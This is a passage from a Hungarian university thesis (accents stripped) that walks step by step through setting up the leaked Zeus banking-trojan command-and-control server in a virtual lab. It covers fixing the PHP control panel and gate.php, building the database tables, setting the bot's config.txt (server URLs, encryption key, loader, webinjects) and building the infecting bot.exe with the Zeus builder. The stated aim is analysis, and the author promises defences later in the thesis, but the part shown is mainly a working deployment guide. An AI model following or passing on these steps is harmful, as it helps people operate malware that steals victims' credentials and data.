Kzel minden orszgban tallhat Zeus trjai vrussal fertztt szmtgp, illetve valamilyen Zeus vltozat bot hlzat. A vilg orszgai kzl a legjelentsebb s legnagyobb botnet hlzatok orszgai az Amerikai Egyeslt llamok, Egyiptom, Mexik, Szad-Arbia s Trkorszg. Mg ide lehet sorolni az Eurpai Unit is ahol tbb orszg is veszlyeztetett. A bot megtallhat vilgszerte, s gy tovbbra is kvetkezetesen terjed tovbb a kompromittlhat, vdtelen szmtgpekre. 38

10. bra Fertzttsg elterjedse a vilgban

A 10-es bra bemutatja a Zeus fldrajzi eloszlst a Symantec felmrse alapjn. [24]

8.5 Zeus teleptse s bezemelse


A letlttt Zeus llomnyok kzl hrom mappa tartalmra kell nagyobb figyelmet fordtani: source/server[php] output/builder geobase server[php] mappa tartalma Ez tartalmazza a szerver oldalhoz szksges alap fjlokat. Ezek a fjlok nmagukban nem elegendek a Zeus szerver bezemelshez, mert a forrs fjlok sok rejtett hibt tartalmaznak. Ebben a mappban tallhat a vezrl panel (control panel) amin keresztl irnythatjuk s ellenrizhetjk a botokat. builder mappa tartalma Ebben a mappban tallhatak a bot kliens elksztshez szksges fjlok. Egy egyszer kis program segtsgvel tudjuk elkszteni a bot kliensnket, amelyet majd ksbb eljuttatunk az ldozatainknak. geobase mappa tartalma Ez tartalmazza a szerver teleptshez szksges trinformatikai adatokat, azaz az IP cmek kiosztst a nagyvilgban. Ez alapjn hatrozhat meg a fertztt szmtgp mely 39

tnyleges fldrajzi helyzete (orszg pontossggal). A botgazda ez alapjn tudja bekategorizlni, csoportokba szedni a zombi gpeket. A "Mennyibe kerl egy botnet?" cm fejezetben rszletesen taglaltam, hogy mirt is fontos a zombi gpek fldrajzi helyzete.

8.5.1 Szksges eszkzk, elkszlet


Ahhoz, hogy a Zeus mkdst be tudjam mutatni szksgem volt egy kisebb hlzatra, amit egy gy valstottam meg, hogy bezemeltem nhny virtulis szmtgpet, ezzel emulltam az igazi krnyezetet. 6 db virtulis szmtgpre volt szksgem: 1 db Linux opercis rendszert futtat szmtgp 5 db Windows opercis rendszert futtat szmtgp Linux A linux-os szmtgpen a bot szerver zemeltetst kellet megoldanom, ehhez egy Backtrack 5 R3 V2 Linux opercis rendszert hasznltam fel, mert ez egy tkletes ubuntu alap linux opercis rendszer, ha olyan feladatokat kell elltni, mint hlzat figyels, analizls [2], SQL adatbzis hasznlata, stb. A hackerek s penetration teszterek egyik kedvelt opercis rendszere. A szerver (Backtack Linux) opercis rendszer IP cme: 192.168.56.103 Windows A Microsoft Windows-os opercis rendszerrel elltott virtulis szmtgpekbl 2 db Windows XP s 3 db Windows 7 volt. Ezek a gpek voltak az ldozataim, vagyis ez az 5 gp alkotta a kisvllalati hlzatot. Az egyik XP-s gp nem csak ldozat szerepkrt tlttte be, hanem azon generltam le a bot klienst is. A Windows-t futtat szmtgpek IP cmei: 192.168.56.105 (Microsoft Windows XP opercis rendszerrel) 192.168.56.106 (Microsoft Windows 7 opercis rendszerrel) 192.168.56.107 (Microsoft Windows 7 opercis rendszerrel) 192.168.56.108 (Microsoft Windows 7 opercis rendszerrel) 192.168.56.109 (Microsoft Windows XP opercis rendszerrel)

40

8.5.2 Szerver bezemelse


A Zeus bezemels rszben bemutatom pontrl - pontra, hogy sikerlt bezemelnem ezt a kis krtkony programot (fenevadat), majd utna bemutatom a mkdst s vgl analizlom a tevkenysgt. Majd a szakdolgozat vge fel bemutatom, hogy milyen mdszerekkel lehet ellene vdekezni. mySQL adatbzis bezemelse Szksgem volt egy gpre, amelyen be tudom zemeltetni a Zeus szerver rszt, ehhez egy Backtrack 5 R3 V2 Linux opercis rendszert vlasztottam, mert ebbe az opercis rendszerben minden olyan segdeszkzt megtallok, amelyre szksgem lehet a program bezemelshez s ksbbi hasznlathoz, analizlshoz. A Zeus szerverhez szksgem volt egy mySQL szerverre, apach-ra, phpmyadmin-ra, PHP modulra. A bezemels folyamatt lpsenknt fogom bemutatni. Els lps. Els lpsknt fel kellet msolnom a Zeus szerverhez szksges forrs fjlokat a megfelel helyre, ez a server[php] mappa tartalma volt. Nagyon fontos, hogy a felmsolt forrs fjloknak meg kell adni a teljes hozzfrst, ezt linux-ban a "chmod 777 www" paranccsal tudjuk megtenni, ahol www a mappa neve.

11. bra Vezrl panel fjlok a szerveren

41

A mappa 3 fontos fjlt tartalmaz: install/index.php cp.php gate.php install/index.php Az index.php szkript segtsgvel tudjuk feltelepteni a vezrl panelt (control panel) majd belltani a megfelel paramtereket a szmtgpen. cp.php Ez a vezrl panel (control panel), itt tudjuk majd irnytani a botokat. gate.php A zombi gp ezen a kapun keresztl kommunikl az irnyt kzponttal (control panel-el). Msodik lps A Zeus forrskdjnak megfelel helyre val msolst kveten megkezdhetjk a vezrl panel (control panel) teleptst. Bngszvel (pl.: Mozilla Firefox) megnyitjuk az install/index.php oldalt s futtatjuk a php szkriptet. Eredmnyl a 12. brn lthat, forbidden zenetet kaptam. Egyrtelm, hogy a szkript hibs.

12. bra Msodik lps, teleptsi hiba

Mivel a hiba a szkript-ben van, ezrt Linuxban megkerestem az apache error.log fjl-t s kiolvastam a hibazenetet. A 13. brn lthat, hogy szintaktikai hiba van az index.php szkript 115 sorban.

13. bra Msodik lps, hibakeress

42

A hiba a szkriptben itt rejtzik!

14. bra Msodik lps hiba kijavtsa

A 14. brn lthat, hogy a problmt a jabber okozza, ezt a protokollt hasznlja a Zeus arra, hogy ha msodlagos biztonsgi kddal rendelkezik az ldozat, akkor ezt a kulcsot is megszerzi s elkldi a vezrl panel adatbzisnak. Ennek a funkcinak a fejlesztse mg nem zrult le ebben a Zeus verziban, de a mkdse nem befolysolja a Zeus mkdst s funkciit, ezrt ennek a hibnak a javtsra nem fordtottam figyelmet. (Ez a szkript rsz lenne felels azrt, hogy ltrehozza a megfelel trhelyet a jabber segtsgvel megszerzett kulcsoknak, hogy ezekbl a kdokbl riportot lehessen kszteni.) Azokat a rszeket, ahol ezt a protokoll-t hasznlja a Zeus, egyszeren kiveszem a kdbl, mert szmomra ez a mkds irrelevns. A vezrl panelnek (control panel) teleptse kzben szmos olyan jelleg hiba vrhat, ami erre a jabber hibra vezethet vissza. Harmadik lps A Firefox bngszablak frisstst kveten egy res ablakot kaptam vissza. Ismt megnzzk az apache2/error.log-ot (15. bra), ahol jbl egy szintaktikai hibt talhatunk, de most nem az install/index.php szkriptben van a hiba, hanem a system/global.php szkript kd 402-es sorban.

15. bra Harmadik lps hibakeress

A kdrszletben lthat (16. bra), hogy egy jabb jabber-hez kapcsold rsz van a kdban. Az elzekkel analg mdon ismt egyszeren kikommentelem a php kdbl a hibs sorokat. (Itt azokat trol rszeket hozn ltre a Zeus, ahol eltroln a jabber-el elfogott azonostkat s a hozz tartoz egyb adatokat. Pl.: felhasznlnv, jelsz, szerver neve, kommunikcis port szma, fogad fl megnevezse, egyb listk s szkriptek.)

43

16. bra Harmadik lps hibajavts

Negyedik lps A Firefox bngszt frisstst kveten, ismt csak egy res lapot kapunk vlaszul. Figyelembe vve, hogy nem jelent meg jabb hibazenet, valsznleg mg lehet hiba az elz szkript-ben. A 17. brn lthat az apache2/error.log fjl ahol kaptam egy jabb hibazenetet, miszerint a PHP szkriptnk vgzetes hibba tkztt. Ahogy azt vrtuk, mg mindig van problmnk a system/global.php kdunkkal. A hibazenet szerint a 22. sorban van a hiba.

17. bra Negyedik lps, hibakeress

Az elz kt jabber hibt megvizsglva (18. bra) lthat, hogy a fejleszt EVAL megnevezssel kommentelve helyezte el a jabber kd rszt. A kd itt definiln a bot kliens verzijt az adatbzis rszre. Ahogy a tbbi kdrszletnl is tettk, ezt is kikommentezem.

18. bra Negyedik lps, hibajavts

44

tdik lps rmmel tapasztalom, hogy a bngsz frissts utn nem hibazenetet s nem egy res lapot ad vissza, hanem a vezrl panel (control panel) teleptjt (19. bra).

19. bra Vezrl panel teleptsi ablak

A vezrl panelen tallhat mezk (19. bra): Root user (rendszergazda felhasznl) User name: botgazda egyedi felhasznli neve Password: az egyedi felhasznlnvhez tartoz jelsz MySQL server (mySQL szerver) Host: itt kell megadni a mySQL adatbzis cmt, ebbe az adatbzisba kldi a bot kliens a megszerzett informcikat. User: az adatbzishoz tartoz felhasznlnv, amely segtsgvel majd a vezrl panel adatbzist telepteni tudja. Password: az adatbzis felhasznlnevhez tartoz jelsz. Database: az adatbzis neve, ide kerlnek az adatokhoz szksges tblk. Local folders (helyi knyvtr) 45

Reports: a riport knyvtr neve. Ez a szerver gp merevlemezn tallhat, alaprtelmezetten a _reports mappanevet ajnlja fel a telept. Options (belltsok) Online bot timeout: Ez a bellts arra szolgl, hogy a bot kliens s a szerver kztti kommunikcis id mennyi, ez alapjn dnti el a szerver, hogy a bot kliens online (aktv) vagy offline (inaktv). Ha a bot kliens aktv, akkor rgtn hadba lehet lltani, teht feladatokat tud vgrehajtani. Ha inaktv, akkor nem elrhet gy aktulis feladatok elltsra alkalmatlan a bot. Encryption key: Ez az egyik legfontosabb bellts a vezrl panelen. Ezt a kulcsot hasznlja titkostsra a bot kliens s a szerver kztti kommunikcihoz. Ha ezt a kulcsot nem ismerjk, akkor a bot kliens nem fog tudni csatlakozni a szervernkhz. A megfertztt gp egy mkd zombi gp lesz, az elre belltott feladatokat el fogja vgezni, azonban irnytani, parancsot kiadni a zombi gpnek nem lehet s a megszerzett adatokat sem lesz kpes a szerver fel tovbbtani. gynevezett nmagban mkd zombi szmtgp lesz, akinek nincs gazdja. A szvegdoboz aljn tallhat kt jell ngyzet segtsgvel adhatjuk meg, hogy az elkszlt riportok hol troldjanak el, adatbzisban s/vagy helyi meghajtn.

46

Vezrl panel (Control panel) bezemelse A vezrl panel teleptje most mr mkdkpes, gy elkezdtetjk a vezrl panel teleptst. Ltrehozhatjuk az adatbzisunkat a szerveren, ahov majd eltroljuk az eltulajdontott s megszerzett informcikat. Hatodik lps A vezrl panel telept felletn kitltjk a szveg dobozokat a megfelel adatokkal s rkattintunk az install (telepts) gombra. Sajnos a vlasz nem az amire vrtam, jabb hibba tkztem.

20. bra Vezrl panel teleptsi ablak kitltse

A 21. brn lthat a hibazenet, amit a vezrl panel teleptse kzben kaptunk.

21. bra Hatodik lps hibakeress

A 21. brn lthatak a teleptsi lpsek. Az els hrom feladatot sikeresen elvgezte a telept, miszerint sikeresen csatlakozott az adatbzishoz a root felhasznlval, kivlasztotta a cpdb adatbzist s ltrehozta a botnet_list tblt az adatbzisban. A negyedik sorban lthat a hibazenetet, miszerint SQL hiba lpett fel. A BOT_ID_MAX_CHARS vltoz rtke nulla (null). Az install/index.php kdjban nem tallhat ilyen vltoz deklarci, ezrt ezt ptolnom kellet. 47

22. bra Hatodik lps hibajavts

A 21. brn lthat az is, hogy ez a vltoz egy varchar, vagyis egy karakter tpus vltozt kell deklarlnom, melynek a hossza 255 karakter lehet.

23. bra Hiba javtsa, vltoz definilsa

A 25. sorban deklarlom a define paranccsal a BOT_ID_MAX_CHARS vltozt. (23. bra) Hetedik lps A telepts ismtelt elindtst kveten jra hibba tkzk. Az apache2/error.log fjlban megnzem a hibazenetet

24. bra Hetedik lps hibakeress

Mint ahogy azt a 24. bra is mutatja, az elz lpsben bemutatott hibhoz hasonl hiba merlt fel. Ezttal a BOTNET_MAX_CHARS vltoz nincs deklarlva. Az elz lpshez hasonlan hozom ltre ezt a vltozt is. (25. bra).

25. bra Hetedik lps hibajavtsa vltozok definilsa

48

Nyolcadik lps A vezrl panel teleptsnek jabb ksrlett kveten egy jabb hiba jelentkezett. (26.bra).

26. bra Nyolcadik lps hibakeresse geobase.txt

A negyedik teleptsi lps ltrehozott az adatbzisban egy botnet_reports nevezet tblt. Ide fogja gyjteni majd a bot kliensektl rkez riportokat. Majd tdik lpsknt, ltrehozott egy ipv4toc nev tblt is, ami vilg IPv4 cmek felosztst fogja tartalmazni. A hiba ehhez a tblhoz fzdik, mert nem tudja megnyitni a geobase.txt nev fjlt, ami tartalmazza az orszgok IPv4 cmeinek felosztst. Ezt a fjlt egyszeren letlthetjk az internetrl is, de hasznlhat az is, amit a Zeus forrskdja mell kapcsoltak. n a Zeus forrskdja mellet tallhat geobase.txt fjlt hasznltam. Ezt a fjlt kell bemsolni a vezrl panel mappjban. Ezzel ezt a hibt ki is javtottam, gy jbl elkezdhetjk a vezrl panel teleptst a mr megszokott install gomb segtsgvel.

27. bra Adatbzis sikeres telepts vge

A 27. brn lthat, hogy ez a rsz teljesen lefutott, sikeresen tudtam telepteni a vezrl panelhez szksges rszeket, az adatbzisban ltrejttek a neknk szksges tblk. A teleptsi lpseket vgignzve lthat, hogy sikeresen feltlttte az ipv4toc tblt a geobase.txt-ben lv adatokkal s ezen fell mg frissttet hrom tblt, amire szksgnk lesz mg ksbb. Ltrehozott egy _reports mappt a szerveren a riportoknak, arra az esetre ha az adatbzis elrhetetlen lenne.

49

Ksz a vezrl panelhez szksges adatbzis, most mr tudom hol trolni a bot kliensek ltal kldtt informcit, mr csak a vezrl panel kezelfellett kell bezemelni. De eltte mg bemutatom a mySQL adatbzisba ltrehozott cpdb adatbzis rszeit. mySQL adatbzis A botnet_list tbla trolja s tartalmazza azokat az adatokat, melyek a bot kliens azonostsra s csoportostsra alkalmasak. Pldul, a bot_id a bot egyedi azonostja. Ebbl mindig csak egy van, a tbbi csoportostsra alkalmazhat. Ilyen csoportostsra alkalmas adat pldul a bot verzija (bot_version), IP cm (ipv4), orszg (country), vagy akr az opercis rendszer verzija a megfertztt gpen (os_version). (28. bra).

28. bra mySQL adatbzis botnet_list tbla

50

A 29. brn lthat a botnet_riports tbla, ahol olyan adatok vannak, amelyekbl a riportok kszlnek a botgazda rszre. Itt csak a relevns informcik tallhatak.

29. bra mySQL adatbzis botnet_reports tbla

51

A botnet_scripts tbla (30. bra) tartalmazza azokat a kiegszt funkcikat s szkripteket a bot kliensekhez ktve, amelyeket hasznlunk. Olyan ltalnos informcikat tallhatunk itt a bot kliensrl, melyek segtsgvel beazonosthat, hogy melyik bothoz melyik szkript tartozik.

30. bra mySQL adatbzis botnet_scripts tbla

52

A botnet_scripts_stat tbla (31. bra) statisztikai adatokat tartalmaz az egyes botokon mkd szkriptekre vonatkozan. Ezen adatokat felhasznlva ksbb a vezrl panel segtsgvel a szkriptek hatkonysga mutathat ki statisztikai mdszerekkel.

31. bra mySQL adatbzis botnet_scripts_stat tbla

53

A cp_user tbla (32. bra) a vezrl panel felhasznlinak az adatait tartalmazza.

32. bra mySQL adatbziscp_users tbla

54

Az ipv4toc tbla (33. bra) tartalmazza a geobase.txt adatait, vagyis az orszgok IP cm kiosztst. Ez alapjn tudja meghatrozni a vezrl panel, hogy a zombi gp mely orszgban tallhat. Ez nyjt segtsget a botgazdnak, hogy egy-egy orszgra vonatkozan milyen tmadsi lehetsgek vannak, illetve milyen informcit rdemes eltulajdontani.

33. bra mySQL adatbzis ipvtoc tbla

55

Kilencedik lps Az elz rszekben sikerlt a vezrl panelhez az adatbzist ltrehozni, most a vezrl panel kezelfellett kell mkdsre brni. A vezrl panel az n szerveremen, a var/www/cp.php helyen tallhat. A kezelfelletet a 127.0.0.1/cp.hu cmen keresztl rhet el. A 34. brn lthat, hogy ismt csak egy res lapot mutat a bngsz.

34. bra Firefox vlasz a cp.php megnytskor

Ez arra utal, hogy valami hiba van a cp.php szkriptben is, a mr elzekben is hasznlt hiba keressi mdszerekkel megprblom kiderteni a hiba okt, okait. A 35. brn lthat az apache2/error.log fjl-ban a hibazenet, miszerint a cp.php szkript 147. sorban tallhat a hiba.

35. bra Kilencedik lps hibakeress

A kd vizsglata sorn lthat, hogy a mr elzekben felfedezett jabber protokoll hibval llunk ismt szembe. Lthatjuk, hogy a kd szeretne ltrehozni 2 darab tmbt, amiben a jabber-bl szrmaz riportokat troln. Az elzekhez hasonlan, egyszeren kikommentelem a kdrszletet.

36. bra Kilencedik lps hiba javtsa

56

Tzedik lps A 127.0.01/cp.php ismtelt megnyitsi ksrletekor jra egy res lapot kapunk vissza a bngsztl. Tovbb elemezve az apache2/error.log fjlt azt tapasztalom, hogy a system/lng.en.php fjl 94. sorban is van egy hiba.(37. bra).

37. bra Tzedik lps hibakeresse

A system knyvtrban tallhatak azok az sszetevk, amelyek kellenek a vezrl panel mkdshez. Az egyik ilyen fjl a lng.en.php szkript is, melynek a nevbl kvetkeztethetnk , hogy ez egy nyelvi csomag kiegszt fjl lehet. Amikor megnyitom a system/lng.en.php szkript-et s megnzem a 94. sort, ahol a hiba tallhat (38. bra) felismerhet, hogy a hibt ismtelten a jabber protokoll okozza. Ebben a rszben definil egy LNG_MM_REPORTS_JN vltozt, ami a jabber segtsgvel ltrehozott riportok nyelvezett lltan be. A mr megszokott mdon javtjuk ezt a hibt, egyszeren csak kommentelem ezt a rszt a kdban.

38. bra Tzedik lps hiba javtsa

A hiba javtst kveten megjelent a vezrlpanel bejelentkez kpernyje a bngszablakban. (39. bra). Vezrl panel bemutatsa A vezrl panel a bejelentkez ablakkal indul (39. bra). Az alaprtelmezett URL, ahol megtallhat a vezrl panel http://[SZERVER]/cp.php.

39. bra Vezrl panel bejelentkez kperny

A telepts sorn megadott authentikcis adatokkal (user: admin, password: Qwer1234) belpve a 40. brn lthat mensvot rjk el. 57

40. bra Vezrl panel men

A men hat rszre bonthat: Informci (Information): Ez nem egy vlaszhat men, csak informcit ad a felhasznlnak (bejelentkezett felhasznl, pontos dtum s id). Statisztikk (Statistics): Itt tallhatak a bot kliensekkel kapcsolatos informcik s statisztikk (41. bra).

41. bra Vezrl panel informcik men

o sszefoglals (Summary): Informcis doboz: sszesen hny riport tallhat az adatbzisunkban. 58

Mikor jelentkezett az els bot kliens a vezrl panelnek. sszesen hny bot kliens jelentkezett a vezrl panelnek. sszesen hny aktv bot kliens van. Milyen verzij botokkal kommunikl a vezrl panel. A legkisebb s a legnagyobb bot kliens verzit mutatja meg felhasznlnak. Bot kliens doboz: Megmutatja a felhasznlnak, hogy hny bot kliens ll rendelkezsre s hny j bot kliens van, amit mg nem hasznltunk. Ha tbb botunk van, akkor szrseket alkalmazhatunk, hogy mely botokat szeretnnk ltni. lehetsgnk van visszalltani az j bot kliens tblt is. Ekkor az j botok tbla tartalma trldik, gy ha j gpeket sikerl megfertzni, akkor ebben a tblban jelenek meg az j bot kliensek, gy a felhasznl mindig tudja, ha egy j bot kapcsoldott a rendszerhez. o OS: Egy sszefoglal listt ad a felhasznlnak arrl, hogy a megfertztt gpeken milyen opercis rendszer van (42. bra).

42. bra Vezrl panel opercios rendszer statisztika men

Botnet (43. bra): o Bot kliensek (Bots): Szr (filter): Itt adhatunk meg a bot kliensekre vonatkoz szrsi feltteleket. Csak a felttelnek megfelel botok fognak megjelenni az eredmny (result) dobozban. Lehetsgnk van bot nvre, bot csoportra, IP cmre, vrosokra, NAT sttuszra, online botokra, j botokra, kommentekre szr felttelt ltrehozni. Eredmny (result): Itt lthat a botok egyedi azonostja (ID-ja), csoport neve, verzi szma, a fertztt gp IP cme, tartzkodsi helye, orszg megnevezse (ez nlam nem lthat, mert sajt bels virtulis hlzatom van), bot kzvetlen kapcsolati ideje, a lappangsi id (latency), s a kommentek (ha vannak).

59

43. bra Vezrl panel botnet kliensek men

o Szkriptek (Scripts): Megmutatja, hogy melyik szkriptet, melyik bot hasznlja (44. bra).

44. bra Vezrl panel szkriptek listja men

Riportok, jelentsek (Riports): o Riport keresse az adatbzisban (search in database): Itt olyan informcik tallhatak, amelyet mr a bot kliensnk elfogott. Ismtelten egy szr (filter) (45. bra) s egy eredmny (result) (46. bra) ablakkal tallkozhatunk. Szr felttel panel: Ahogy az brn is lthat, igen sok lehetsg biztostott a megfelel szrfelttel sszelltshoz. Ezzel a funkcival kiszrhetek a tbb tzezer (esetleg milli) zombi gp ltal ksztett jelentsek kzl a szmunkra rdekesek, a megfelel prioritssal rendelkezek. Szr felttelek: Dtum Bot neve Csoport neve Ip cm Vros 60

Jelents tpusa Valamilyen szveg keresse az ellopott adatban Az sszes utols egy nap jelentsek megtekintse Csak a jelentsek mutatsa Csak a meta adatok mutatsa Gp hasznlatnak gyakorisga

45. bra Vezrl panel jelentsek filter men

Eredmny doboz: A szrfeltteleknek megfelel (vlheten relevns) adatokat jelenti meg.

46. bra Vezrl panel jelentsek result men

o Riport keresse a helyi meghajtn (search in files): Hasznos lehet, ha a helyi meghajtn troljuk a botok ltal sszegyjttt informcikat. A vizsglatom sorn adatbzist hasznltam, gy ennek a funkcinak a rszletes ismertetstl most eltekintek. Rendszer (system): o Informcik (Information): A vezrl panel rendszer informciit talljuk meg ebben a men pontban (47.bra). 61

47. bra Vezrl panel informcik

o Belltsok (Options): A 48. brn lthat a belltsok menpont. Itt hatrozhatjuk meg a jelentsek mentsnek helyt, a zombi gp online vagy offline belltsnak idejt, s ami az egyik legfontosabb, a titkostsi kulcsot (Encryption key), aminek ismeretvel tudjuk azonostani s dekdolni a bot kliensek ltal elkldtt informcit.

48. bra Vezrl panel rendszer informcik men

o Felhasznl (User): A 49. brn lthat a felhasznlok menpont. Itt van lehetsgnk a felhasznlk adminisztrlsra, valamint a felhasznl ltal ksztett kpernykpek minsgnek megadsra is.

49. bra Vezrl panel felhasznl men

o Felhasznlk (Users): Ebben a menpontban hozhatunk ltre felhasznlkat s adhatjuk meg jogosultsguk szintjt. Ez a funkci a zombi hlzatok brbeadsakor lehet hasznos. Kilps (logout): kijelentkezs a vezrl panelbl.

62

8.5.3 Bot kliens bezemelse


Sikeresen bezemeltem az adatbzist s a vezrl panelt. A bot kliens ksztsvel folytatom a munkt. Szem eltt kell tartani a tnyt, hogy a bot kliensnk nem csak neknk fogja sugrozni a megszerzett informcit, ezrt sajt adatokkal soha ne prbljuk ki. A vizsglatot elszigetelten, virtulis szmtgpeken, rzkeny adatoktl mentes krnyezetben vgezzk, gy problmamentesen ismerkedhetnk a botnetek vilgval, tanulmnyozhatjuk, analizlhatjuk a Zeus bot mkdst. A bot kliens elksztshez a builder knyvtrban tallhat zsb.exe fjlt hasznlom. A futtatst megelzen el kell vgezni a szksges belltsokat a config.txt fjlban. Ez a fjl tartalmazza azokat a belltsokat, amellyel a bot kpes lesz a kommunikcira a szerverrel. Ha ezt nem tesszk meg, akkor a bot-ot el tudjuk kszteni s mkdni is fog, de tnyleges kommunikci a bot s a mi szervernk kztt nem lesz. t fontos bellts van, amit mindenflekppen be kell lltanunk az eredeti fjlban ahhoz, hogy a bot kliens megfelelen mkdjn (50. bra): url_config: azt az tvonalat tartalmazza, amely alapjn fel tudja venni a bot kliens a szerverrel a kapcsolatot s le tudja tlteni a bot kliens belltsokat (config.bin fjl)-t. Ebben a fjlban tallhatak azok a belltsok, parancsok, szkriptek, exploitok, amely segtsgvel a bot kpes lesz utasts hatsra a megfelel informcit megszerezni az ldozat gprl. encryption_key: ezt a kulcsot hasznlja a bot s a szerver kztti kommunikci titkostsra, s a bot azonostsra. Ha ezt a kulcsot nem ismerjk, akkor a bot nem kpes kommuniklni a szerverrel s nem tudunk adatot lopni az ldozat gprl. url_loader: a szerveren tallhat bot.exe fjlt hasznljuk tovbbi gpek megfertzsre. url_server: a szerver gpen lv kommunikcis csatorna kiptsre szolgl php szkript fjl elrhetsge, a bot kliens a gate.php fjl segtsgvel pti ki a kapcsolatot a szerver s az ldozati gp kztt. file_webinject: az itt belltott fjl segtsgvel lehet hamis web oldalt hasznlni, ennek segtsgvel lehet olyan informcikat megszerezni az ldozat gprl, amelyhez az alap funkcikat hasznlva nem lennnk kpesek. 63

Az URL belltsokhoz mindig azt az tvonalat, IP cmet kell megadni ahol az adatbzis s a vezrl panel szervernk tallhat, ez jelenleg a megnevezse] cmen tallhat. http://192.168.56.103/[fjl

50. bra Config.txt fjl tartalam

A config fjl belltst kveten elindtottam a zsb.exe fjl-t, ami maga a Zeus builder alkalmazs (51. bra). n a szakdolgozatomban mr az elksztett builder alkalmazst hasznlom, de az alkalmazs forrskdja megtallhat a Zeus csomagban is. Az alkalmazsnak hrom fontos rsze van: Informcik (Information): a kulcs belltsa, ami alapjn felismerhet a bot kliensem. Bot elksztse (Builder): a builder rsz, ahol elkszthetem magamnak a bot.exe-t amivel fertzni tudom a gpeket. Belltsok (Settings): alkalmazs nyelvt lehet belltani. 64

51. bra Zeus builder alkalmazs

A bot tnyleges elksztse igen egyszer folyamat: a sajt config.txt fjlunk kivlasztst kveten csak r kell bkni a Build the bot executable gombra (52. bra). Ekkor az alkalmazs belltja a szerver cmt, a kulcsot, integrlja a megfelel szkripteket. A folyamat befejeztvel egy felugr prbeszdablakon keresztl elmenthet a ksbbi fertzsekhez hasznlhat bot.exe fjl.

52. bra bot.exe ksztse

A builder knyvtrban (53. bra) tallhat a config.txt, webinjects.txt, s a config.bin fjl is. A kt .txt fjl a bot kpessgeinek bvtst s a megfelel kommunikci belltsokat tartalmazza. A .bin fjlt a szerverre kell majd helyezni, ami szintn a bot belltsait tartalmazza. Ezt a fjlt tlti le a bot kliens, amikor felveszi a szerverrel a kapcsolatot, ezzel a fjllal tudjuk irnytani s vezrelni a bot-kat. 65

53. bra bot.exe mentse

A fertz fjl elksztse igen egyszer volt. Mr csak egy pr lps van htra s hasznlni tudom a Zeus rendszernket. A szerveren a vezrl panel s az adatbzis mkdik, a bot.exe, vagyis a fertz fjl is mkdik. Mr csak a megfertztt gp s a szerver kztti kommunikcit kell helyrelltani. Tizenegyedik lps A bot kommunikcijt gy tudom helyre lltani, hogy a teszt krnyezetben, a virtulis hlzatunkon az egyik ldozat gpn futtatom a korbban elksztett bot.exe fjlt, ezzel szimullom amikor az ldozat gpre feltelepti a bot kliens-t. Mieltt elindtom a bot.exe fjl-t, a szerver gpen elindtom a Wireshark hlzatfigyel programot. Az 54. brn lthat, hogy amikor elindtottam a Windows XP gpen a bot.exe-t, akkor a bot kliens rgtn felvette a kapcsolatot a szerverrel. Ez bizonytja, hogy a config.txt fjlban jl lltottam be a szerver cmt s a kommunikcihoz szksges kulcsot. A bot els feladata az, hogy letlti a szerver gprl a config.bin fjl-t. Ez a fjl tartalmazza azokat a belltsokat s kiegszt alkalmazsokat, amely kell a bot megfelel mkdshez. Minden egyes els csatlakozskor, amikor a bot kliens felveszi, a kapcsolatot a szerver gppel akkor letlti ezt a fjlt s a benne tallhat belltsokat alkalmazza.

54. bra Bot els kommunikcija a szerverrel, config fjl lekrse.

66

Ha sszelltom a folyamot, akkor lehet ltni, hogy a zombi gp felveszi a kapcsolatot a 192.168.56.103 IP-cmen tallhat szerverrel, ahol sikeres kapcsoldssal zrul a folyamat (55. bra).

55. bra Config fjl TCP folyam sszeraksa

Ezek szerint az alapbelltsok rendben vannak, a bot tud kommuniklni a szerverrel, a config fjl-t sikeresen megkapja a zombi gp. Mr csak azt kell megnzni, hogy a zombi gp megjelent-e a vezrl panel rendszerben. Sajnos a vezrl panel kezelfelletn nem tallhat a zombi gp kommunikcija, gy a mr ismert mdon az apache2/error.log fjlban megnzem, hogy milyen hiba okozhatja a problmt. Lthat, hogy a gate.php fjl 15. sorban van egy szintaktikai hiba. A $data nev vltozba szeretn a @file_get_contents(php://input ); tartalmt belerakni. A hibt a zrjelben lv szveg vgn lv szkz okozza (56. bra). A javtsa egyszer, csak ki kell trlni az res mezt. Mivel az apache2/error.log fjlban tbb hiba nem volt feltntetve, gy ezzel ezt a hibt ki is javtottam.

56. bra Tizenegyedik lps hiba javtsa

67

Tizenkettedik lps Tovbbiakban is a hlzati forgalmat figyelve prblom megfelel mkdsre brni a Zeus bot s a szerver kztti kommunikcit. Az 57. brn lthat, hogy a bot kliens a gate.phpn keresztl prblja felvenni a kapcsolatot a szerverrel.

57. bra Wireshark gata.php kommunikci

A gate.php-hoz tartoz folyam sszelltsa (58. bra) utn lthat, hogy a csomag informci tartalma nagyon kicsi. Ennek az az oka, hogy mieltt a bot kliens a szervernek a gate.php-n keresztl adatot kldene, a kliens s a szerver kztti egyeztets (adatok kldsnek ideje) megszakad. Ebbl arra kvetkeztetek, hogy kdolsi problma lehet a kt gp kztt.

58. bra Gate csomag sszelltsa

A mr megszokott mdon megnzem az apache2/error.log fjlomat, amit a 59. bra mutat. A fjlban lthat, hogy a gate.php szkript 36. sorban van valami problma.

68

59. bra Tizenkettedik lps hiba keresse

Megvizsglva a gate.php szkriptet lthat, hogy a bot verzi szma s a bot egyedi azonostja vltozk nem kaptak rtket (60. bra). Ekkor a szerver eldobja a kapcsolatot.

60. bra Tizenkettedik lps hiba a gate.php fjlban

Az internetet segtsgl hvva, a https://bitbucket.org/ davaeron/zeus/ src/c1173ad0fdf3/ source/common/defines.php oldalon tallhat adatokat hasznltam fel a hiba kijavtshoz. Ennek segtsgvel tudtam azokat a vltozkat definilni a config.php fjlunkban, amelyek segtsgvel tudja a szerver rtelmezni a zombi gp ltal kldtt adatokat.

61. bra Tizenkettedik lps hiba javtsa

69

A 61. brn lthat hogyan definiltam a vltozkat s a hozz megfelel rtkeket. Ezutn a szerver mr tudja rtelmezni a bot kliens ltal kldtt adatokat. A vezrl panelben innentl kezdve megjelentek a bot kliens-ek, lthatak lettek a zombi gpek. Megjelent 2 j bot a vezrl panelen (62. bra), lthatak lettek a jelentsek s a botok attribtumai is.

62. bra Vezrl panelben megjelentek a zombi gpek

8.6 Zeus mkdtetse


